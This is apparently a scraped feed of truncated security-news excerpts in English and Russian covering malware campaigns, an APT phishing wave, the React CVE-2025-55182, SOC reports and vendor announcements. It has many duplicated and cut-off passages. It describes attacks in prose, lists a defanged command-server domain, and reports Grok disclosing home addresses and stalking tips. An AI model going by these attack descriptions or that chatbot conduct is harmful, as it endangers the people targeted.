All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

You can also help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

If you would like to further support the podcast, and gain access to ad-free episodes, become a supporter by joining The AI Fix Plus!

Follow Graham Cluley on LinkedIn, Bluesky, or Mastodon to read more of the exclusive content we post.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast with computer security veteran Graham Cluley, joined this week by special guest Danny Palmer.

Smashing Security #448:The Kindle that got pwned [Your browser does not support the audio element]Host:Graham Cluley:@grahamcluley.com @[email protected] / grahamcluleyGuest:Danny Palmer:/ dannypalmerwriter‬Episode links:Sponsors:Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podca…

The cruise line has updated its list of prohibited items, specifically banning smart glasses and similar wearable devices from public areas.

The ban means that you could find your expensive Google Glass, Meta/Ray-Ban Stories confiscated by the cruise's security team if you break the rules.

An obvious question is why are smart glasses subject to a ban onboard, but not other recording devices such as smartphones and regular cameras?

And, unfortunately, it's not always obvious that someone is wearing smart glasses.

Smart glasses are becoming increasingly sophisticated and harder to distinguish from regular glasses.

In episode 81 of The AI Fix, Graham discovers that deepfakes are already marking your kids’ homework, while Mark glimpses the future when he discovers AI agents that can communicate by reading each other’s minds.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

You can also help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

If you would like to further support the podcast, and gain access to ad-free episodes, become a supporter by joining The AI Fix Plus!

Follow Graham Cluley on LinkedIn, Bluesky, or Mastodon to read more of the exclusive cont…

Regular readers of Hot for Security will have read plenty of articles about cybercriminals who have created malware, or malicious hackers who have used malware to infect the systems of victims.

But the news this week is that a court in Singapore has jailed a man not for launching an attack himself, but instead for teaching others exactly how to do it.

According to Singaporean authorities this is the country's first prosecution specifically targeted against somebody who had taught others how to use malware.

Prosecutors claim that Lee Rong Teng provided Cheoh with several versions of the spyware and asked him to learn how they functioned.

Cheoh’s alleged accomplice, Lee Rong Teng, is thought …

Analyst firm Gartner has issued a blunt warning to organizations: Agentic AI browsers introduce serious new security risks and should be blocked "for the foreseeable future." Read more in my article on the Fortra blog.

Plus, Graham chats with Rob Edmondson from CoreView about why misconfigurations and over-privileged accounts can make Microsoft 365 dangerously vulnerable.

All this, and more, in episode 447 of the “Smashing Security” podcast with Graham Cluley, and special guest Jenny Radcliffe.

Smashing Security listeners get $1000 off!

CoreView – Benchmark your Microsoft 365 tenant security against the Center for Internet Security (CIS) controls.

Join Smashing Security PLUS for ad-free episodes and our early-release feed!

A new report from the United States's Financial Crimes Enforcement Network (FinCEN) has shone a revealing light on the state of the criminal industry of ransomware. The report, which examines ransomware incidents from 2022 to 2024, reveals that attackers extorted more than $2.1 billion over the three-year period. Yes, that number is enormous - but it hides a more interesting story beneath it: that after peaking in 2023, ransomware payments actually started to decline. Read more in my article on the Fortra blog.

Remember when a notorious ransomware gang hit the Irish Health Service back in May 2021?

Four years on, and it seems victims who had their data exposed will finally receive compensation.

The attack against the Health Service Executive (HSE) began when the Russia-linked Conti ransomware group tricked a user into downloading a boobytrapped Microsoft Excel file.

The Health Service Executive (HSE) has now made an offer of €750 to victims whose personal data was compromised in what was declared the largest ever cyber attack against a health service computer system in Ireland.

According to media reports, a Cork-based solicitors firm representing more than 100 people affected by the data breach re…

A 22-year-old from Newport Beach, California has pleaded guilty to his role in a sophisticated criminal network that stole approximately US $263 million in cryptocurrency from victims.

Evan Tangeman is the ninth defendant to plead guilty in connection with what prosecutors have described as a highly-organised criminal enterprise, dubbed the "Social Engineering Enterprise" (SE Enterprise).

Some members of SE Enterprise specialised in hacking databases to identify wealthy cryptocurrency investors.

Evan Tangeman admitted to working as a money launderer for the group, helping convert US $3.5 million worth of stolen cryptocurrency into cash.

For all their supposed sophistication, the downfall of…

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

You can also help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

If you would like to further support the podcast, and gain access to ad-free episodes, become a supporter by joining The AI Fix Plus!

Follow us:Follow the show on Bluesky, or subscribe for free in your favourite podcast app such as Apple Podcasts or Spotify, or visit our website for more information.

Follow Graham Cluley on LinkedIn, Bluesky, or Mastodon to read more of the exclusive content we post.

Grok, the AI chatbot developed by Elon Musk's xAI, has been found to exhibit more alarming behaviour - this time revealing the home addresses of ordinary people upon request.

And, as if that wasn't enough of a privacy violation, Grok has also been exposed as providing detailed instructions for stalking and surveillance of targeted individuals.

If Grok was not able to identify the exact person, it would often return lists of similarly named individuals with their addresses.

Grok was also not afraid of offering tips for encountering a world-famous pop star, providing tips for waiting near venue exits.

As AI becomes embedded in our daily lives, it is clear that stronger safeguards are not opti…

Особенно любопытна эта атака тем, что в этот раз злоумышленники потратили определенные усилия для маскировки своей активности под коммуникацию с известным сайтом и работу легитимного ПО.

Кроме того, зловред умеет делать скриншоты с экрана жертвы и собирать файлы в интересующих злоумышленников форматах (преимущественно разнообразные документы и архивы).

Файлы размером меньше 100 МБ вместе с остальной собранной злоумышленниками информацией отправляются на другой сервер коммуникации с названием ants-queen-dev.azurewebsites[.]net.

Как оставаться в безопасностиНаши защитные решения выявляют как используемый в этой атаке вредоносный код, так и коммуникацию с командными серверами злоумышленников.

…

Что нужно знать об этих изменениях и какие знания и привычки взять с собой в 2026 год?

Мы рекомендуем Kaspersky Premium — с ним вы получите и защиту от вредоносного ПО, и оповещения (если ваши личные данные засветились в каких-то публичных утечках), и менеджер паролей, и родительский контроль, и многое другое.

Как и в случае с фастфудом, телевизором, TikTok и другими легкодоступными благами, важно найти баланс между здоровым применением этих помощников и опасными привычками.

А где-то вам подключили дополнительную опцию, о которой вы и не знаете, и ее нужно отключить.

Предполагается, что нейросети помогут дому самостоятельно решать, что и когда делать, чтобы владельцу было удобнее, — без зар…

В основном Stealka распространяют на популярных ресурсах — вроде GitHub, SourceForge, Softpedia, sites.google.com и других — под видом кряков известных программ, читов и модов для игр.

Чем опасен стилер StealkaУ Stealka достаточно большой арсенал возможностей, но «лакомый кусок» для него — данные из браузеров на движках Chromium и Gecko.

Не менее интересны для хакеров куки-файлы и токены сессий, которые позволяют обойти двухфакторную аутентификацию и угнать аккаунты без ввода пароля.

В зоне риска — Discord, Telegram, Unigram, Pidgin, Tox и другие.. В служебных файлах мессенджеров хранятся данные об аккаунтах, идентификаторы устройств, токены авторизации и параметры шифрования переписки.

— S…

Наши эксперты из команды GReAT обнаружили и исследовали новую волну целевых рассылок за авторством APT-группы «Форумный тролль».

Внутри содержались персонализированные ссылки, по которым жертве предлагали скачать отчет о проверке какого-то материала на плагиат, что, по замыслу атакующих, должно было заинтересовать ученых.

В случае если жертва испытывала сомнения в легитимности письма и заходила на страницу e-library{.

Сам файл, впрочем, не был персонализирован — это был достаточно размытый отчет в формате одной из российских систем проверки на плагиат.

Мы рекомендуем устанавливать надежные ИБ-решения не только на все устройства, с которых сотрудники выходят в Интернет, но и на почтовый шлюз…

Мы в «Лаборатории Касперского» изучили, какой путь проходят данные после фишинговой атаки: кому они достаются, как их сортируют, перепродают и используют на теневом рынке.

: реквизиты карт, данные от криптокошельков.

В таких архивах часто попадаются мусорные и устаревшие данные, и поэтому стоят они недорого: стартовая цена — $50.

Данными пользователей торгуют при этом не только в даркнете, но и в старом добром Telegram.

Несложно догадаться, что наиболее дорогой и востребованный товар на этом рынке — данные от банковских аккаунтов и криптокошельков.

Разумеется, сообщать облачный пароль нельзя никому — он нужен исключительно для того, чтобы войти в ваш аккаунт в Telegram.. Сделайте это в разделе Настройки → Конфиденциальность Telegram прямо сейчас.

После недавнего обновления в Telegram появилась возможность защитить вход в аккаунт не только облачным паролем, но и ключом доступа.

После недавнего обновления в Telegram появилась возможность защитить вход в аккаунт не только облачным паролем, но и ключом доступа.

Поэтому мы рекомендуем создать сложный и уникальный облачный пароль Telegram и хранить как его, так и ключ доступа для Telegram в Kaspersky Password Manager.

Поэтому мы рекомендуем создать сложный и уникальный облачный пароль Teleg…

Правоохранительные органы Южной Кореи арестовали четырех подозреваемых во взломе 120 000 IP-камер, установленных как в частных домах, так и в коммерческих помещениях — например, в комнатах караоке, студии пилатеса и гинекологической клинике.

Объясняем, что представляют собой IP-камеры и в чем состоят их уязвимости, а также подробно рассказываем об инциденте в Южной Корее и о том, как не стать жертвой злоумышленников, охотящихся за горячими видео.

Что случилось в Южной КорееВернемся к событиям, произошедшим этой осенью в Южной Корее.

Он взломал 63 000 IP-камер и создал, а затем продал 545 видео сексуального характера за 35 миллионов южнокорейских вон (чуть меньше 24 000 долларов).

Он взломал…

В этом посте попробуем определить, какие активы требуют первоочередного внимания, как их обнаружить и в какой форме проводить реагирование.

Физические и виртуальные серверы остаются бесхозными в крупных инфраструктурах после проектов по миграции или после слияния и поглощения компаний.

Важно также закрепить в политике способы учета создаваемых хранилищ и запрет на «бесхозные» данные, доступные без ограничений, паролей и шифрования.

Для внутренней разработки — обязательное использование сканеров и комплексных систем защиты, интегрированных с конвейером CI/CD и предотвращающих сборку ПО с устаревшими компонентами.

Подключенные к сети, но не управляемые и не обновляемые роутеры, межсетевые экр…

Недавно на новостных сайтах появилась информация о том, что некие злоумышленники распространяют инфостилер через бесплатные файлы 3D-моделей для ПО Blender.

Почему Blender и онлайн-маркетплейсы 3D-моделей могут быть источниками рискаBlender — это программное обеспечение для создания 3D-графики и анимации, которое используется множеством специалистов по визуализации в различных областях.

Среди прочих возможностей Blender есть и поддержка выполнения Python-скриптов, которые используются для автоматизации задач и расширения функциональности ПО.

Чем опасны рабочие инструменты, не контролируемые ИБПроблема не в Blender как таковом — злоумышленники неизбежно попробуют эксплуатировать возможности …

Теперь поделиться можно еще и чатом с ИИ-ассистентом, и ссылка на него будет вести на официальный сайт чат-бота.

При правильном вводе скрипт скачивает вредоносное ПО и использует указанный пароль для установки и запуска зловреда.

Инфостилер и бэкдорЕсли пользователь поддастся на уговоры, на его компьютере запустится распространенный инфостилер AMOS (Atomic macOS Stealer).

Использовать надежную защиту от вредоносного ПО на всех своих смартфонах, планшетах и компьютерах, включая компьютеры под управлением macOS и Linux.

Никогда не выполнять технические инструкции, о которых вы не просили и в которых разбираетесь не до конца.

Что нового в Kaspersky Embedded Systems Security для WindowsНаши эксперты значительно переработали кодовую базу решения, добавив ряд продвинутых механизмов детектирования и блокирования угроз.

Что нового в Kaspersky Embedded Systems Security для LinuxМы значительно доработали и новый KESS для Linux, но большинство нововведений в нем повышают эффективность уже реализованных защитных механизмов.

В нем мы планируем:Обеспечить полную совместимость Kaspersky Embedded Systems Security с сервисом Kaspersky Managed Detection and Response.

Добавить в Kaspersky Embedded Systems Security для Linux технологию защиты от BadUSB, которая уже работает в Windows-версии.

Обеспечить поддержку решением Kaspers…

3 декабря стало известно о скоординированном устранении критической уязвимости CVE-2025-55182 (CVSSv3 — 10), которая содержалась в React server components (RSC), а также во множестве производных проектов и фреймворков: Next.js, React Router RSC preview, Redwood SDK, Waku, RSC-плагинах Vite и Parcel.

Учитывая, что на базе React и Next.js построены десятки миллионов сайтов, включая Airbnb и Netflix, а уязвимые версии компонентов найдены примерно в 39% облачных инфраструктур, масштаб эксплуатации может быть очень серьезным.

Благодаря компонентам RSC, появившимся в React 18 в 2020 году, часть работы по сборке веб-страницы выполняется не в браузере, а на сервере.

Изначально React предназначен дл…

C октября этого года наши технологии фиксируют вредоносные рассылки файлов, в названии которых эксплуатируется тема годовых премий и бонусов.

Еще одной интересной особенностью данной вредоносной кампании является то, что в качестве полезной нагрузки выступает XLL-файл, что достаточно нестандартно.

Атакующие, конечно, меняют иконку, но в некоторых интерфейсах — в первую очередь в «проводнике Windows» — очевидно, что тип файла не соответствует видимому расширению, как показано, например, вот в этом посте.

Тип файла XLL служит для надстроек Microsoft Excel и, по сути, представляет собой DLL-библиотеку, которая запускается непосредственно программой для работы с электронными таблицами.

Часть ко…

Наверняка найдутся и желающие применить на практике новую атаку Whisper Leak.

Исследователи из Microsoft продолжили эту тему и проанализировали параметры поступления ответа от 30 разных ИИ-моделей в ответ на 11,8 тысяч запросов.

Сравнив задержку поступления пакетов от сервера, их размер и общее количество, исследователи смогли очень точно отделить «опасные» запросы от «обычных».

Как защититься от Whisper LeakОсновное бремя защиты от этой атаки лежит на провайдерах ИИ-моделей.

Если вы пользуетесь моделью и серверами, для которых Whisper Leak актуален, можно либо сменить провайдера на менее уязвимого, либо принять дополнительные меры предосторожности.

Как устроена автоматическая машина для тасования карт Deckmate 2Машина для автоматического тасования карт Deckmate 2 была запущена в производство в 2012 году.

В предыдущей модели устройства, Deckmate, внутренней камеры не было и, соответственно, не было возможности подглядеть последовательность карт в колоде.

Как исследователи смогли взломать устройство Deckmate 2Опытные читатели нашего блога уже наверняка заметили несколько уязвимостей в конструкции Deckmate 2, которыми воспользовались исследователи для создания proof-of-concept.

Это позволяло специалистам в реальном времени узнавать порядок карт в тасовке.

Как мафия использовала взломанные Deckmate 2 в реальных покерных играхДва года спус…

In my last two blogs, I delved into the results of the 2025 Cisco Segmentation Report to highlight the importance of macro- and micro-segmentation and to identify the primary challenges hindering segmentation journeys.

Today, I dive further into the survey results to discuss the benefits organizations can achieve when they successfully implement a dual macro- and micro-approach to segmentation.

Three Benefits of a Successful Segmentation StrategyThe good news is that the survey results indicate that organizations further along in their segmentation journeys are indeed achieving measurable benefits from their successful macro- and micro-segmentation implementations.

If you haven’t already, c…

A Cisco Talos Incident Response (Talos IR) Retainer doesn’t only help you respond to threats but fundamentally changes how your organization approaches cybersecurity.

A Talos IR Retainer delivers organization-wide benefits that strengthen organization’s entire security ecosystem.

The Talos IR retainer works seamlessly with your existing security tools, while providing access to real-time intelligence on adversary tactics.

Read the full blog to see how a Talos IR Retainer can transform your cybersecurity posture from vulnerable to vigilant: Why a Cisco Talos Incident Response Retainer is a game-changer.

Ask a question and stay connected with Cisco Security on social media.

In this context, the importance of Data Loss Prevention (DLP) capability for data protection cannot be overstated.

Cisco Secure Access: Unified, AI-Powered Data Loss Prevention (DLP) for the Modern EnterpriseCisco Secure Access delivers the next generation of Data Loss Prevention (DLP) as a core component of our Security Service Edge (SSE).

Secure Access DLP also plays a vital role in enabling the safe use of generative Artificial Intelligence (AI) applications and model repositories.

The Endpoint DLP Advantage: Safeguarding Data Movement at the SourceIncorporating endpoint DLP into an organization’s data protection strategy brings immense value.

Recognizing this, Cisco Secure Access launch…

Cisco ISE: Live network visibility—but not always aligned with CMDB metadata or lifecycle information.

The Old Way Was LimitedPrevious integrations between Cisco ISE and ServiceNow attempted to close this gap by pushing CMDB attributes into ISE.

The Cisco ISE + ServiceNow Service Graph Connector finally closes the loop between visibility and control.

With Service Graph Connector for Cisco ISE, watch your network inventory come alive.

Ask a question and stay connected with Cisco Security on social media.

Cisco Identity Intelligence is now the first Cisco product to deliver a customer facing capability powered entirely by a Cisco built artificial intelligence model, Foundation-sec-1.1-8B-Instruct.

Strengthening Identity Security Through Deeper InsightCisco Identity Intelligence helps organizations understand and respond to identity related risk across their entire environment.

A key part of this experience is the weekly email digest that Cisco Identity Intelligence sends to administrators.

Why the Cisco Foundation Model MattersCisco Identity Intelligence selected the Cisco Foundation AI model because it offers clear advantages in quality, control, and long-term strategic alignment.

A Cisco-o…

According to our survey results, 94% of organizations are currently facing segmentation challenges, which range from technical to non-technical issues.

Challenges Inhibiting Segmentation ProjectsUnderstanding the challenges organizations face will ease the transition from partial to comprehensive segmentation implementations, allowing organizations to accelerate their progress through their segmentation journeys.

Currently, what are/ could be the biggest segmentation challenges you are/ could be experiencing at your organization?

Overcoming Segmentation Challenges Enables a Proactive Security StrategySegmentation remains a foundational element of enterprise security.

In the meantime, downlo…

Thanks to Duo, I was quickly given access to all the essential tools: Cisco XDR, Splunk, firewall dashboards, and more from the duo directory.

Detection: Cisco XDR flagged the suspicious behavior, visualizing the connections between one internal asset and several high-risk external hosts.

This raised immediate concerns about potential malware or command-and-control activity (see Cisco XDR investigation below).

In summary, my first SOC experience turned initial nerves into genuine confidence.

Ask a question and stay connected with Cisco Security on social media.

As a reminder, when a Windows client is seeking to talk to a domain controller it will make DNS queries for SRV records for names like _kerberos._tcp.dc._msdcs.DOMAINNAME or _ldap._tcp.dc._msdcs.DOMAINNAME.

These DNS requests enable the client to find nearby Kerberos or LDAP servers for their domain.

Finally, the Cisco Live network is designed to be a safe network for attendees to use.

A properly configured VPN client like Cisco Secure Client can support both a full tunnel VPN and “Start Before Login”.

Check out the other blogs by my colleagues in the Cisco Live Melbourne 2026 SOC.

Kerberoasting: An attacker with a valid ticket can request service tickets from the KDC which are encrypted with the service account password.

An attacker with a valid ticket can request service tickets from the KDC which are encrypted with the service account password.

Cisco XDR: Cross-signal correlation and incident management spanning Secure Firewall, Secure Access (DNS), Secure Network Analytics, and partner telemetry.

Cross-signal correlation and incident management spanning Secure Firewall, Secure Access (DNS), Secure Network Analytics, and partner telemetry.

Secure Network Analytics: NetFlow analytics to surface scanning, beaconing, and anomalous connection patterns at scale.

Building on the success of the 2nd annual Security Operations Centre (SOC) at Cisco Live Melbourne (Asia Pacific Japan) 2024, the executive team supported the first SOC for Cisco Live San Diego (Americas) and invited the team back for 20025.

The SOC at Cisco Live SOC was successfully deployed in just 12 hours over 1 ½ days, demonstrating extensive prior planning and specialized expertise.

The partnership with Endace, a highly skilled full-packet capture provider, whose experience in the 2025 SOC was critical and extended to their commitment for Cisco Live Melbourne.

For example, Ryan MacLennan created an AI model to find domain generated algorithms at the Cisco Live AMER Security SOC.

Ackno…

Joining the Security Operations Centre (SOC) team in Cisco Live Melbourne was a new experience for me as a Cisco Technical Marketing Engineer (TME).

As a Tier1 / Tier 2 analyst the first screen to look at is Cisco XDR, that will bring incidents from the different data sources including Splunk Core.

Day 1 at Cisco Live and guess what?

Distributed Deniel of Service (DDoS) activity was detected targeting Cisco TV devices connected to Cisco Live network.

Check out the other blogs by my colleagues in the Cisco Live APJC 2026 SOC.

In the Cisco Live Melbourne SOC, we use a combination of Endace full packet capture (PCAP), Splunk Enterprise Security, and Splunk SOAR to provide automated detections of cleartext credential leakage.

We resolve this using the coalesce function in Splunk’s eval command.

The coalece function will return the first non-null value from a list of possible values, just like the COALESCE function in SQL.

In our case, we use it like so:However, during Cisco Live we discovered a problem with this logic.

One answer is a Splunk macro.

One area of integration between CSF and Splunk that we worked on at Cisco Live Melbourne involved Enterprise Security Content Update (ESCU) detections in Splunk Enterprise Security (ES).

Splunk ES has around two dozen ESCU detections for Cisco Secure Firewall.

These can be accessed from ES by navigating to Security Content > Content Management and then searching for ‘Secure Firewall’.

All ESCU detections for Secure Firewall reference the same macro, ‘cisco_secure_firewall’.

We transitioned our firewall log export to syslog a few conferences ago, and in Melbourne we decided to test the ESCU detections with syslog.

Sometimes though we see exceptions, in this circumstance an asset connected to the Attendee Wi-Fi network at Cisco Live Melbourne 2025 exhibited a large spike in traffic on multiple occasions.

Upon investigation, the asset was found to be connecting to multiple confirmed malicious external IP addresses.

When the Incident was investigated, we found that the asset was communicating with numerous external IP addresses classified as malicious.

Investigating further, we saw the internal IP address communicating with a number of external IP addresses, all classed as malicious.

Cisco Security Social MediaLinkedInFacebookInstagramX

The Adrenaline of the Real World: Rapid Threat Containment on DisplayThe first thing that strikes you when you walk into the Cisco Live SOC is the energy.

The XDR & Splunk ES Synergy: The key highlight of the visibility demo was the seamless data exchange between XDR and Splunk ES.

Forging the Future: Empowering New and Tier One AnalystsPerhaps the most inspiring aspect of the SOC tours was the focus on people.

The Cisco Live Melbourne 2025 SOC tours weren’t just about the technology of today; they were about sharing our experiences, delivering on the EDUCATE component of our Mission.

Check out the other blogs by my colleagues in the Cisco Live APJC 2026 SOC.

To further help organizations before, during, and after a cyber incident, we’re excited to introduce new proactive incident response services designed to help organizations build resilience and minimize disruption.

Microsoft Incident Response Strengthen your security with intelligence-driven incident response from Microsoft.

Incident response plan development : We assist organizations in developing their own incident response plan, using lessons from real-world incidents.

Cyber range : Microsoft Incident Response delivers simulations that provide high-fidelity, hands-on experience in a controlled environment.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the lat…

Phishing actors are exploiting complex routing scenarios and misconfigured spoof protections to effectively spoof organizations’ domains and deliver phishing emails that appear, superficially, to have been sent internally.

While these attacks share many characteristics with other credential phishing email campaigns, the attack vector abusing complex routing and improperly configured spoof protections distinguishes these campaigns.

The below hunting queries can also be found in the Microsoft Defender portal for customers who have Microsoft Defender XDR installed from the Content Hub, or accessed directly from GitHub.

ReferencesLearn moreFor the latest security research from the Microsoft Thr…

Phishing actors are exploiting complex routing scenarios and misconfigured spoof protections to effectively spoof organizations’ domains and deliver phishing emails that appear, superficially, to have been sent internally.

While these attacks share many characteristics with other credential phishing email campaigns, the attack vector abusing complex routing and improperly configured spoof protections distinguishes these campaigns.

The below hunting queries can also be found in the Microsoft Defender portal for customers who have Microsoft Defender XDR installed from the Content Hub, or accessed directly from GitHub.

ReferencesLearn moreFor the latest security research from the Microsoft Thr…

Microsoft Defender Experts Suite Get integrated security services that protect your organization and accelerate security outcomes in the new security offering from Microsoft.

The Defender Experts Suite can help you do the following:Defend against cyberthreatsMicrosoft Defender Experts for XDR delivers round-the-clock MXDR, natively integrated with Microsoft Defender.

When you first get started with the Microsoft Defender Experts Suite, Enhanced Designated Engineering guides you through deploying Defender workloads securely and helps ensure Defender Experts for XDR is configured correctly.

From January 1, 2026, through December 1, 2026, eligible customers can save up to 66% on the Microsoft …

But point solutions can only go so far.

In our new e-book, 3 reasons point solutions are holding you back, we share how a unified, AI-ready platform can transform your security operations to help keep your organization safe.

Download the 3 reasons point solutions are holding you back e-book and discover how a unified, AI-ready platform can help your team stay ahead of cyberthreats and prepare for the future.

Learn moreTo learn more about Microsoft Security solutions, visit our website.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

An Access Fabric solution continuously decides who can access what, from where, and under what conditions—in real time.

Why a unified approach to access security is better than a fragmented oneLet’s use an everyday example to illustrate the difference between an access security approach that uses fragmented tools versus one that uses an Access Fabric solution.

This time you, your device, your applications, and your data are wrapped in the protection of an Access Fabric solution that connects identity, device, and network signals.

What makes an Access Fabric solution effectiveFor an Access Fabric solution to secure access in hybrid work environments effectively, it must be contextual, connec…

The React Server Components ecosystem is a collection of packages, frameworks, and bundlers that enable React 19 applications to run parts of their logic on the server rather than the browser.

To exploit CVE-2025-55182, an attacker sends a crafted input to a web application running React Server Components functions in the form of a POST request.

Microsoft Defender Vulnerability Management and Microsoft Defender for CloudMicrosoft Defender for Cloud rolled out support to surface CVE-2025-55182 with agentless scanning across containers and cloud virtual machines (VMs).

In parallel, we recommend that you upgrade affected React Server Components and Next.js packages immediately to patched versi…

The React Server Components ecosystem is a collection of packages, frameworks, and bundlers that enable React 19 applications to run parts of their logic on the server rather than the browser.

To exploit CVE-2025-55182, an attacker sends a crafted input to a web application running React Server Components functions in the form of a POST request.

Microsoft Defender Vulnerability Management and Microsoft Defender for CloudMicrosoft Defender for Cloud rolled out support to surface CVE-2025-55182 with agentless scanning across containers and cloud virtual machines (VMs).

In parallel, we recommend that you upgrade affected React Server Components and Next.js packages immediately to patched versi…

Today, we are proud to share that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass for Generative AI Defense.

The post Microsoft named an overall leader in KuppingerCole Leadership Compass for Generative AI Defense appeared first on Microsoft Security Blog.

Today, we are proud to share that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass for Generative AI Defense.

The post Microsoft named an overall leader in KuppingerCole Leadership Compass for Generative AI Defense appeared first on Microsoft Security Blog.

This form of cyberattack involves operatives posing as legitimate remote hires, slipping past human resources checks and onboarding processes to gain trusted access.

With support from Microsoft Threat Intelligence, we quickly traced the activity to the North Korean remote IT workforce known as Jasper Sleet.

TACTICPiKVM devices—low-cost, hardware-based remote access tools—were utilized as egress channels.

Advanced detection tools, including Microsoft Defender for Identity and Microsoft Defender for Endpoint, were deployed to uncover lateral movement and credential misuse.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

This form of cyberattack involves operatives posing as legitimate remote hires, slipping past human resources checks and onboarding processes to gain trusted access.

With support from Microsoft Threat Intelligence, we quickly traced the activity to the North Korean remote IT workforce known as Jasper Sleet.

TACTICPiKVM devices—low-cost, hardware-based remote access tools—were utilized as egress channels.

Advanced detection tools, including Microsoft Defender for Identity and Microsoft Defender for Endpoint, were deployed to uncover lateral movement and credential misuse.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Our blog “Building human-centric security skills for AI” offers insights and guidance you can apply in your organization.

Find in AI Skills Navigator, our agentic learning space, AI and security training tailored to different roles.

—Jeana Jorgensen, Corporate Vice President, Microsoft LearningFostering a culture that prioritizes securityAs AI impacts everyone’s role, make security awareness and responsible AI practices shared priorities.

From awareness to actionIn the agentic AI era, people continue to be our most valuable resource.

It’s essential to empower them with AI and equip them with the skills they need to use AI responsibly and securely.

Our blog “Building human-centric security skills for AI” offers insights and guidance you can apply in your organization.

Find in AI Skills Navigator, our agentic learning space, AI and security training tailored to different roles.

—Jeana Jorgensen, Corporate Vice President, Microsoft LearningFostering a culture that prioritizes securityAs AI impacts everyone’s role, make security awareness and responsible AI practices shared priorities.

From awareness to actionIn the agentic AI era, people continue to be our most valuable resource.

It’s essential to empower them with AI and equip them with the skills they need to use AI responsibly and securely.

As email threats grow more sophisticated and layered security architectures become more common, organizations need clear, data-driven insights to evaluate how their security solutions perform together.

Microsoft’s commitment to transparency continues with the release of our second email security benchmarking report, informed by valuable customer and partner feedback.

The study compares environments protected exclusively by Microsoft Defender with those using a Secure Email Gateway (SEG) positioned in front of Defender, as well as environments where Integrated Cloud Email Security (ICES) solutions add a secondary layer of detection after Defender.

Secure Email Gateway and Integrated Cloud Em…

These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation.

What’s Domain Control Validation?

Domain Control Validation is a security-critical process designed to ensure certificates are only issued to the legitimate domain operator.

Sunsetted methods relying on email:Sunsetted methods relying on phone:Sunsetted method relying on a reverse lookup:For everyday users, these changes are invisible - and that’s the point.

These changes push the ecosystem toward standardized (e.g., ACME), modern, and auditable Domain Control Validation methods.

Partnership with ArmOur goal is to raise the bar on GPU security, ensuring the Mali GPU driver and firmware remain highly resilient against potential threats.

We partnered with Arm to conduct an analysis of the Mali driver, used on approximately 45% of Android devices.

This approach allowed us to roll out the new security policy broadly while minimizing the impact on developers.

This effort spans across Android and Android OEMs, and required close collaboration with Arm.

The Android security team is committed to collaborating with ecosystem partners to drive broader adoption of this approach to help harden the GPU.

We built on Gemini's existing protections and agent security principles and have implemented several new layers for Chrome.

To further bolster model alignment beyond spotlighting, we’re introducing the User Alignment Critic — a separate model built with Gemini that acts as a high-trust system component.

A flow chart that depicts the User Alignment Critic: a trusted component that vets each action before it reaches the browser.

The User Alignment Critic runs after the planning is complete to double-check each proposed action.

Looking forwardThe upcoming introduction of agentic capabilities in Chrome brings new demands for browser security, and we've approached this challenge with the same ri…

Android uses the best of Google AI and our advanced security expertise to tackle mobile scams from every angle.

Over the last few years, we’ve launched industry-leading features to detect scams and protect users across phone calls, text messages and messaging app chat notifications.

To help combat these types of financial scams, we launched a pilot earlier this year in the UK focused on in-call protections for financial apps.

The UK pilot of Android’s in-call scam protections has already helped thousands of users end calls that could have cost them a significant amount of money.

We’ve also started to pilot this protection with more app types, including peer-to-peer (P2P) payment apps.

Secure by DesignWe built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products.

Secure Sharing Channel: The communication channel itself is hardened by our use of Rust to develop this feature.

On Android, security is built in at every layer.

On Android, security is built in at every layer.

Secure Sharing Using AirDrop's "Everyone" ModeTo ensure a seamless experience for both Android and iOS users, Quick Share currently works with AirDrop's "Everyone for 10 minutes" mode.

Our first rust memory safety vulnerability...almost: We'll analyze a near-miss memory safety bug in unsafe Rust: how it happened, how it was mitigated, and steps we're taking to prevent recurrence.

Our First Rust Memory Safety Vulnerability...AlmostWe recently avoided shipping our very first Rust-based memory safety vulnerability: a linear buffer overflow in CrabbyAVIF.

Unsafe Review and TrainingOperating system development requires unsafe code, typically C, C++, or unsafe Rust (for example, for FFI and interacting with hardware), so simply banning unsafe code is not workable.

Dmytro Hrybenko for leading the effort to develop training for unsafe Rust and for providing extensive feedback on …

Survey shows Android users’ confidence in scam protectionsGoogle and YouGov3 surveyed 5,000 smartphone users across the U.S., India, and Brazil about their experiences.

The findings were clear: Android users reported receiving fewer scam texts and felt more confident that their device was keeping them safe.

Android users were 58% more likely than iOS users to say they had not received any scam texts in the week prior to the survey.

As an extra safeguard, Google Messages also helps block suspicious links in messages that are determined to be spam or scams.

As an extra safeguard, Google Messages also helps block suspicious links in messages that are determined to be spam or scams.

What's worse, many plaintext HTTP connections today are entirely invisible to users, as HTTP sites may immediately redirect to HTTPS sites.

To address this risk, we launched the “Always Use Secure Connections” setting in 2022 as an opt-in option.

We now think the time has come to enable “Always Use Secure Connections” for all users by default.

For more than a decade, Google has published the HTTPS transparency report, which tracks the percentage of navigations in Chrome that use HTTPS.

Since HTTP navigations remain a regular occurrence for most Chrome users, a naive approach to warning on all HTTP navigations would be quite disruptive.

To help accelerate adoption of AI for cybersecurity workflows, we partnered with Airbus at DEF CON 33 to host the GenSec Capture the Flag (CTF), dedicated to human-AI collaboration in cybersecurity.

